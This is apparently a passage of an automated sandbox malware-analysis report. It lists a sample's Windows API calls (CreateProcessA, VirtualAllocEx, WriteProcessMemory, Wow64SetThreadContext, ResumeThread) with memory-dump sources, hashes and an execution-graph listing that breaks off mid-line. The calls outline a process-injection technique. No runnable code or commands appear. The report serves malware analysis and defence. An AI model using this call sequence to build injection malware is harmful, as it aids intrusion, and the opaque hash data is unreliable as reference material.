                            • Opcode Fuzzy Hash: ff7f0eb44dc7ca52d67192e695ddd0fcacfa19cc6ce2a25938417af273cb6720
                            • Instruction Fuzzy Hash: 852115B19103499FDB10CFAAC981BEEBBF5FF48310F14842AE959A7241C7799941CBA4
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0747D95E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: f3d3e0a9833d6c3562ff1c162bca588419b4b0ae56d68962eb81b5172f158d59
                            • Instruction ID: 9cc61e03c55edc10219aa233f37db72f10b7c2fe86401bdc4dee0823d02a6a5d
                            • Opcode Fuzzy Hash: f3d3e0a9833d6c3562ff1c162bca588419b4b0ae56d68962eb81b5172f158d59
                            • Instruction Fuzzy Hash: 212168B1D003099FDB10CFAAC881BEEBBF4EF49224F14842ED459A7240CB789945CFA5
                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0747DFE8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: b3315c30089a29f7842e00993114bbb69b833aad7cf027f4cd7a46ef8c7c16d9
                            • Instruction ID: 447d953f854c2e8c6e77bbaa597a12d5d843da3cb880535e88953335fcdd8d10
                            • Opcode Fuzzy Hash: b3315c30089a29f7842e00993114bbb69b833aad7cf027f4cd7a46ef8c7c16d9
                            • Instruction Fuzzy Hash: 422139B1D003499FDB10DFAAC841BEEBBF5FF48310F50842AE558A7240C7799501CBA5
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D897
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 4dbc2c97b94f5049ac203df87fd7e909fa40326e09b3a921bc20ae844d0a0f3b
                            • Instruction ID: 9124bfeb83c187b57759d8addc9a76b3a48cb7e919adba64dc4956abf2e56126
                            • Opcode Fuzzy Hash: 4dbc2c97b94f5049ac203df87fd7e909fa40326e09b3a921bc20ae844d0a0f3b
                            • Instruction Fuzzy Hash: 9221D2B5D00248DFDB20CFAAD884AEEBBF5FB48310F14841AE958A7350D378A945CF60
                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0747DFE8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: bf667edc41f46f2c1b2afc9d348dd5ca75cf2a545138bd27ea5d3675b99d757b
                            • Instruction ID: 068962023d6a45e5eec6761e4c750acc0117d047f83ee7336a15978ac68666e6
                            • Opcode Fuzzy Hash: bf667edc41f46f2c1b2afc9d348dd5ca75cf2a545138bd27ea5d3675b99d757b
                            • Instruction Fuzzy Hash: 422116B1D003499FDB14DFAAC840BEEBBF5FF48310F10842AE958A7240C7799541CBA5
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0747D95E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: d56465785775bba10853fade627bc220171a1714ff36c22dddad3853a8236128
                            • Instruction ID: b4eeeb934afc77b1e07c97512ca738b9f19f028b67ef2b500112239340ccdae4
                            • Opcode Fuzzy Hash: d56465785775bba10853fade627bc220171a1714ff36c22dddad3853a8236128
                            • Instruction Fuzzy Hash: 9F2165B1D003098FDB10CFAAC480BEEBBF4EF48224F14842ED459A7240CB789945CFA4
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0171D897
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: da1dee778ce5c35aa01a6ad40fdc6f37817d44ded7e82e2ab51f0d8ba57ce17a
                            • Instruction ID: ad0705bb06c95c801e2cfda813cc8a5f05d65fe2fde09901a925bebac71dfe64
                            • Opcode Fuzzy Hash: da1dee778ce5c35aa01a6ad40fdc6f37817d44ded7e82e2ab51f0d8ba57ce17a
                            • Instruction Fuzzy Hash: E221E3B5D00248DFDB10CF9AD484ADEFBF4EB48310F14841AE958A7350D378A940CF65
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0747DA26
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: e843cf233072df183326bd8fb41b612c0503e0569f5930df1bc5f5f6abe6e7ef
                            • Instruction ID: f01b0f6163cb31631ea0d3d8b9309de51d6a58d4a21bf7e22fa372175f82e4fd
                            • Opcode Fuzzy Hash: e843cf233072df183326bd8fb41b612c0503e0569f5930df1bc5f5f6abe6e7ef
                            • Instruction Fuzzy Hash: F12156729002489FDB20DFAAC840BEFBFF5EF48320F14841AE555A7250CB35A540CFA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8644de014171a0baae7513ab52f62bbfdd3825babc9e0eb027f15f51f16b657f
                            • Instruction ID: 83bd7c3bb2e5656012db6be07b92dede2dc50b63c93686132a98ae1b57238287
                            • Opcode Fuzzy Hash: 8644de014171a0baae7513ab52f62bbfdd3825babc9e0eb027f15f51f16b657f
                            • Instruction Fuzzy Hash: 741149B1D003488FDB24DFAAD8457EFFBF8EF48220F14841AD459A7640CA79A541CFA5
                            APIs
                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0747DA26
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 6b7fe3745b0ff5c1101b5fd061cc7ef5e9bfd339468779ca2843fc3fc83ff56a
                            • Instruction ID: c41f8839951f6ff94c5839554e6bdb50a0b50dbf88418c37e8e51fab329b8f1f
                            • Opcode Fuzzy Hash: 6b7fe3745b0ff5c1101b5fd061cc7ef5e9bfd339468779ca2843fc3fc83ff56a
                            • Instruction Fuzzy Hash: ED1126729003499FDB24DFAAC844BDFBBF5EF48310F14881AE555A7250CB75A540CFA5
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 8c570ef5eb87214588a3ffb589996bfd19d61a86f6df0fcd29d7a64b73164d20
                            • Instruction ID: 6b39e7bc01993f4ad707e78bc1689fc411c33b07da2ad7af09eb8a9d21310e65
                            • Opcode Fuzzy Hash: 8c570ef5eb87214588a3ffb589996bfd19d61a86f6df0fcd29d7a64b73164d20
                            • Instruction Fuzzy Hash: E71128B1D003488FDB24DFAAC4457DEFBF4EF48224F14841AD559A7240CB79A541CFA5
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0171B17E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: 8ceaf5b6270b58d3b5e7de5c8b0035f964e37dc2129647bdcfc925809f3ac4d8
                            • Instruction ID: 79df31804499204e5029a030d97ad8ea98bdae230dd37e543472d70e7546debc
                            • Opcode Fuzzy Hash: 8ceaf5b6270b58d3b5e7de5c8b0035f964e37dc2129647bdcfc925809f3ac4d8
                            • Instruction Fuzzy Hash: 421110B6C003498FDB20CF9AC844BDEFBF4EB88310F11842AD858A7210C379A545CFA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 527cc9bbb3c90a6bdffcb9f6c6f70883fd873d4058e868277bec1db0cd9eed5a
                            • Instruction ID: c76563c734bf3ae313e35001df4998ea04a94530760ad31a31a2074c997ee421
                            • Opcode Fuzzy Hash: 527cc9bbb3c90a6bdffcb9f6c6f70883fd873d4058e868277bec1db0cd9eed5a
                            • Instruction Fuzzy Hash: 41210372504304EFDF15DF94D9C1B26BB65FB88328F20C5A9ED490B656C336D816CBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7aaf534fa073b6f56bec4e28c4c68828b6cd60b3eff7df9a24e7c5480b5677e
                            • Instruction ID: bc05a23597bc379bf3f650e1b7455946a4ee49dc1f4cddd3c23b6aee66db5c74
                            • Opcode Fuzzy Hash: f7aaf534fa073b6f56bec4e28c4c68828b6cd60b3eff7df9a24e7c5480b5677e
                            • Instruction Fuzzy Hash: B5214872500204DFDF15DF54D9C1B66BB65FB84318F20C16CE90A1F256C736E446CAA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363363383.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_14ad000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5dd0166d19d004cc02d838aa3c3727a08597ea324f8df6152aa0a3c985ec5953
                            • Instruction ID: 7bb206512e3310914503f5fa2f65eb5b8df709f902bc7c51109f2990cf3496d5
                            • Opcode Fuzzy Hash: 5dd0166d19d004cc02d838aa3c3727a08597ea324f8df6152aa0a3c985ec5953
                            • Instruction Fuzzy Hash: 1D2103B1948200DFDB15DF64D980B16BB61EB94318F60C56EE90A4B7A6C336D407CA62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363363383.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_14ad000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 440707e1ddc360b6204d9bab539042b8e14f9c66d8adcb7d4f0ba24056400304
                            • Instruction ID: 8586cb87a4555456eba86d8bdaa926559d659b56634408379baea32bd48a1c5b
                            • Opcode Fuzzy Hash: 440707e1ddc360b6204d9bab539042b8e14f9c66d8adcb7d4f0ba24056400304
                            • Instruction Fuzzy Hash: B3210772904300EFDB15DF94D9C0B26BB65FB94324F60C56EE9094F7A2C336D846CA61
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363363383.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_14ad000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7b129853d10b21eea496068cfda564aacecc32190e484106c2b7feaa44ea2b4
                            • Instruction ID: 63f90723a1a109024ef5b67af977ccac5e846338dea6d7a3d4c9702764a037ab
                            • Opcode Fuzzy Hash: d7b129853d10b21eea496068cfda564aacecc32190e484106c2b7feaa44ea2b4
                            • Instruction Fuzzy Hash: 8F21B0755493808FCB02CF24D590716BF71EB46214F29C5DBD8498F6A3C33A980ACB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63590c6d4b85089a62ccbb5b73be6abf778bad766966e0b930af7b7dfcf8d66b
                            • Instruction ID: 6e0050bea00cf9093f523d5ec6374d7265a371466128c54b4a8124c1d1527511
                            • Opcode Fuzzy Hash: 63590c6d4b85089a62ccbb5b73be6abf778bad766966e0b930af7b7dfcf8d66b
                            • Instruction Fuzzy Hash: E9219D76504240DFDF16CF54D9C4B16BF62FB84324F24C5A9DD490B656C33AD426CBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                            • Instruction ID: 33e24c918667d93ad900158d9ce26c0642088373d73b061b48dc15c1bf84e054
                            • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                            • Instruction Fuzzy Hash: 6B11CDB2404240DFDF16CF44D5C1B56BF61FB84324F2486A9D9090B657C33AE456CBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363363383.00000000014AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014AD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_14ad000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                            • Instruction ID: 9c1caefa66c55bad79894a384a9d2a55896a050b5066cbf8f5dc3bf0a0676725
                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                            • Instruction Fuzzy Hash: 12118E76904240DFDB16CF54D5C4B16FF61FB84324F24C6AAD8494BBA6C33AD44ACB51
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a375d3b55c73202afe3534d2028f868793fda9f5df60d2cfc6b040a727614acd
                            • Instruction ID: e14689d1452e9d8a22435e2b8064ced144dda952c449316196461089f3303a28
                            • Opcode Fuzzy Hash: a375d3b55c73202afe3534d2028f868793fda9f5df60d2cfc6b040a727614acd
                            • Instruction Fuzzy Hash: 2901A731404384AAFF205EA9CDC576ABFDCEF41668F18C559ED494E283C2799840CAB2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1362712725.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_139d000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3d6031ad934129984e122dedd90ecd6eb059d2c9281ebe2d6ba42c0804d8060
                            • Instruction ID: 537719671b0edd15a09e7ef2249f2fde3275953e4427b61807e48cfeb25f537a
                            • Opcode Fuzzy Hash: d3d6031ad934129984e122dedd90ecd6eb059d2c9281ebe2d6ba42c0804d8060
                            • Instruction Fuzzy Hash: E1F06871405384AEEB108E19D984B66FFD8DB41774F18C55AED494F283C2759844CA71
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9d4daee60bc3fd2377a071b3450c2c553d8bcf03f2bac6cae6e2d503c318cba0
                            • Instruction ID: aaa5b56c2595517ff25b16b42c2413e0e3abb34b20370e4ca27f6fd784ea7eb1
                            • Opcode Fuzzy Hash: 9d4daee60bc3fd2377a071b3450c2c553d8bcf03f2bac6cae6e2d503c318cba0
                            • Instruction Fuzzy Hash: 1CE10AB4E0025A8FDB14DFA9C584AEEFBB2FF89304F24815AD814AB755D7309941CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baa103e2d415a80e112cd4d33f70ee2342da226575aab1fc65a438b75f96732a
                            • Instruction ID: 52064ec826be7390576a816b97d1c32b3a827c03b014442f7c28b6577c345724
                            • Opcode Fuzzy Hash: baa103e2d415a80e112cd4d33f70ee2342da226575aab1fc65a438b75f96732a
                            • Instruction Fuzzy Hash: BDE1DAB4E102598FDB14DFA9C584AAEFBB2FF89305F24816AD814AB355D7309D41CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18fd859effc1fb73cc75b576b78ada31f6a5a32686cc02c5cf75b649f71fd0d9
                            • Instruction ID: 08eca044a2ffad282ea89937114f8452caf863e639f14f3d6054338736565d2f
                            • Opcode Fuzzy Hash: 18fd859effc1fb73cc75b576b78ada31f6a5a32686cc02c5cf75b649f71fd0d9
                            • Instruction Fuzzy Hash: DBE109B4E0025A8FDB14DFA9C584AEEBBB2FF89305F24816AD914AB355D7309D41CF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39160a272f675786910c86814c6d7a1e0c74d978dc14b40b0f6fc0e3dd01d397
                            • Instruction ID: c180017bce7c88d2eb793833323ca1123998d3569fb3aced721068c1aec81c06
                            • Opcode Fuzzy Hash: 39160a272f675786910c86814c6d7a1e0c74d978dc14b40b0f6fc0e3dd01d397
                            • Instruction Fuzzy Hash: 76E1F9B4E002598FDB14DFA9C584AAEFBB2FF89305F24816AD814AB355D7309D41CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e72c99cec500c16baf5a577b18406286d036895ad1f883d00fe7a13e2af5af70
                            • Instruction ID: 91ad2a61b0db173e0f5312d35cfd7dfae3d024dbd609d290655693819ffbd0ec
                            • Opcode Fuzzy Hash: e72c99cec500c16baf5a577b18406286d036895ad1f883d00fe7a13e2af5af70
                            • Instruction Fuzzy Hash: 70E1FAB4E002598FDB14DFA9C584AAEFBB6FF89305F24815AD814AB355C730AD41DF60
                            Memory Dump Source
                            • Source File: 00000000.00000002.1363693937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1710000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d15ceade43f3fda13995b3218030ed0b91a88ee94a9cd1ec897b1d5b2ed51139
                            • Instruction ID: 27412707befe897087cdd1f3143310da19dbe80bf38418e2e8a24e0a60ad6b26
                            • Opcode Fuzzy Hash: d15ceade43f3fda13995b3218030ed0b91a88ee94a9cd1ec897b1d5b2ed51139
                            • Instruction Fuzzy Hash: 70A16236E002168FCF05DFB8C8445DEFBB2FF89300B15856AE905AB269DB71E959CB50
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 01e14ce44d2b567bdba75c2177fab70b5b9f7038614541f6fe26621e8e742c87
                            • Instruction ID: 41593a715c40187f08c80cd90d9821ef7c572b54ce902080c132058f4eb3a8d4
                            • Opcode Fuzzy Hash: 01e14ce44d2b567bdba75c2177fab70b5b9f7038614541f6fe26621e8e742c87
                            • Instruction Fuzzy Hash: 4451F8B0E002198FDB14DFA9D5845EEFBB6BF89300F24816AD818AB315D7319942CFA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a25193c7082007f8c750c208ee36d449baffef43bbf1e7dd979c7366848fc25
                            • Instruction ID: 345af4713bd4d1a212b00b0ba0049a0e9066e7ef8c6ec8d2030f4431145a9d66
                            • Opcode Fuzzy Hash: 2a25193c7082007f8c750c208ee36d449baffef43bbf1e7dd979c7366848fc25
                            • Instruction Fuzzy Hash: 3D51FAB4E0021A8FDB14CFA9C5845EEBBB2EF89304F14816AD818AB715D7359941CFA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1371029920.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7470000_Nfi2yQDBda.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 163e81249146dc4dac7c77e2d87d346f741d562deb3ae53048f3722ecec769bf
                            • Instruction ID: d2b67b96a74672decc97eb250954994e2221293c0fe2cc7180d13b63b5c70e71
                            • Opcode Fuzzy Hash: 163e81249146dc4dac7c77e2d87d346f741d562deb3ae53048f3722ecec769bf
                            • Instruction Fuzzy Hash: 34510AB4E002198FDB14CFA9C5845EEBBF2EF89304F24816AD818AB715D7319D41CFA1

                            Execution Graph

                            Execution Coverage:9.3%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:169
                            Total number of Limit Nodes:11
                            execution_graph 39909 bda0ff8 39910 bda1183 39909->39910 39911 bda101e 39909->39911 39911->39910 39914 bda1278 PostMessageW 39911->39914 39916 bda1271 PostMessageW 39911->39916 39915 bda12e4 39914->39915 39915->39911 39917 bda12e4 39916->39917 39917->39911 39918 2d2ae30 39919 2d2ae3f 39918->39919 39921 2d2af19 39918->39921 39922 2d2af5c 39921->39922 39923 2d2af39 39921->39923 39922->39919 39923->39922 39924 2d2b160 GetModuleHandleW 39923->39924 39925 2d2b18d 39924->39925 39925->39919 39725 2d2d5c8 39726 2d2d60e 39725->39726 39730 2d2d797 39726->39730 39733 2d2d7a8 39726->39733 39727 2d2d6fb 39736 2d2bca0 39730->39736 39734 2d2d7d6 39733->39734 39735 2d2bca0 DuplicateHandle 39733->39735 39734->39727 39735->39734 39737 2d2d810 DuplicateHandle 39736->39737 39738 2d2d7d6 39737->39738 39738->39727 39926 2d24668 39927 2d2467a 39926->39927 39928 2d24686 39927->39928 39930 2d24779 39927->39930 39931 2d2479d 39930->39931 39935 2d24888 39931->39935 39939 2d24878 39931->39939 39937 2d248af 39935->39937 39936 2d2498c 39937->39936 39943 2d2449c 39937->39943 39941 2d24888 39939->39941 39940 2d2498c 39940->39940 39941->39940 39942 2d2449c CreateActCtxA 39941->39942 39942->39940 39944 2d25918 CreateActCtxA 39943->39944 39946 2d259cf 39944->39946 39739 74ae6d7 39740 74ae538 39739->39740 39741 74ae511 39739->39741 39741->39740 39745 74afd20 39741->39745 39761 74afd10 39741->39761 39777 74afd7e 39741->39777 39746 74afd3a 39745->39746 39755 74afd5e 39746->39755 39794 bda02fb 39746->39794 39801 bda02a5 39746->39801 39806 bda02c2 39746->39806 39813 bda070d 39746->39813 39818 bda010c 39746->39818 39823 bda018f 39746->39823 39829 bda0748 39746->39829 39834 bda03ab 39746->39834 39838 bda064b 39746->39838 39842 bda05d4 39746->39842 39847 bda0332 39746->39847 39851 bda0472 39746->39851 39856 bda0b38 39746->39856 39755->39740 39762 74afd3a 39761->39762 39763 bda02fb 4 API calls 39762->39763 39764 bda0b38 2 API calls 39762->39764 39765 bda0472 2 API calls 39762->39765 39766 bda0332 2 API calls 39762->39766 39767 bda05d4 2 API calls 39762->39767 39768 bda064b 2 API calls 39762->39768 39769 bda03ab 2 API calls 39762->39769 39770 bda0748 2 API calls 39762->39770 39771 74afd5e 39762->39771 39772 bda018f 2 API calls 39762->39772 39773 bda010c 2 API calls 39762->39773 39774 bda070d 2 API calls 39762->39774 39775 bda02c2 4 API calls 39762->39775 39776 bda02a5 2 API calls 39762->39776 39763->39771 39764->39771 39765->39771 39766->39771 39767->39771 39768->39771 39769->39771 39770->39771 39771->39740 39772->39771 39773->39771 39774->39771 39775->39771 39776->39771 39778 74afd0c 39777->39778 39780 74afd81 39777->39780 39779 74afd5e 39778->39779 39781 bda02fb 4 API calls 39778->39781 39782 bda0b38 2 API calls 39778->39782 39783 bda0472 2 API calls 39778->39783 39784 bda0332 2 API calls 39778->39784 39785 bda05d4 2 API calls 39778->39785 39786 bda064b 2 API calls 39778->39786 39787 bda03ab 2 API calls 39778->39787 39788 bda0748 2 API calls 39778->39788 39789 bda018f 2 API calls 39778->39789 39790 bda010c 2 API calls 39778->39790 39791 bda070d 2 API calls 39778->39791 39792 bda02c2 4 API calls 39778->39792 39793 bda02a5 2 API calls 39778->39793 39779->39740 39780->39740 39781->39779 39782->39779 39783->39779 39784->39779 39785->39779 39786->39779 39787->39779 39788->39779 39789->39779 39790->39779 39791->39779 39792->39779 39793->39779 39861 74ad9b8 39794->39861 39865 74ad9b0 39794->39865 39795 bda031c 39869 74ada78 39795->39869 39873 74ada70 39795->39873 39796 bda0a63 39802 bda02bb 39801->39802 39803 bda0b5f 39802->39803 39877 74ad3f8 39802->39877 39881 74ad3f0 39802->39881 39803->39755 39885 74ad8d9 39806->39885 39889 74ad8e0 39806->39889 39807 bda02ae 39808 bda0b5f 39807->39808 39811 74ad3f8 ResumeThread 39807->39811 39812 74ad3f0 ResumeThread 39807->39812 39808->39755 39811->39807 39812->39807 39815 bda072f 39813->39815 39814 bda0a63 39816 74ada78 WriteProcessMemory 39815->39816 39817 74ada70 WriteProcessMemory 39815->39817 39816->39814 39817->39814 39819 bda0197 39818->39819 39893 74ae100 39819->39893 39897 74ae0f4 39819->39897 39824 bda0192 39823->39824 39825 bda0122 39823->39825 39827 74ae100 CreateProcessA 39825->39827 39828 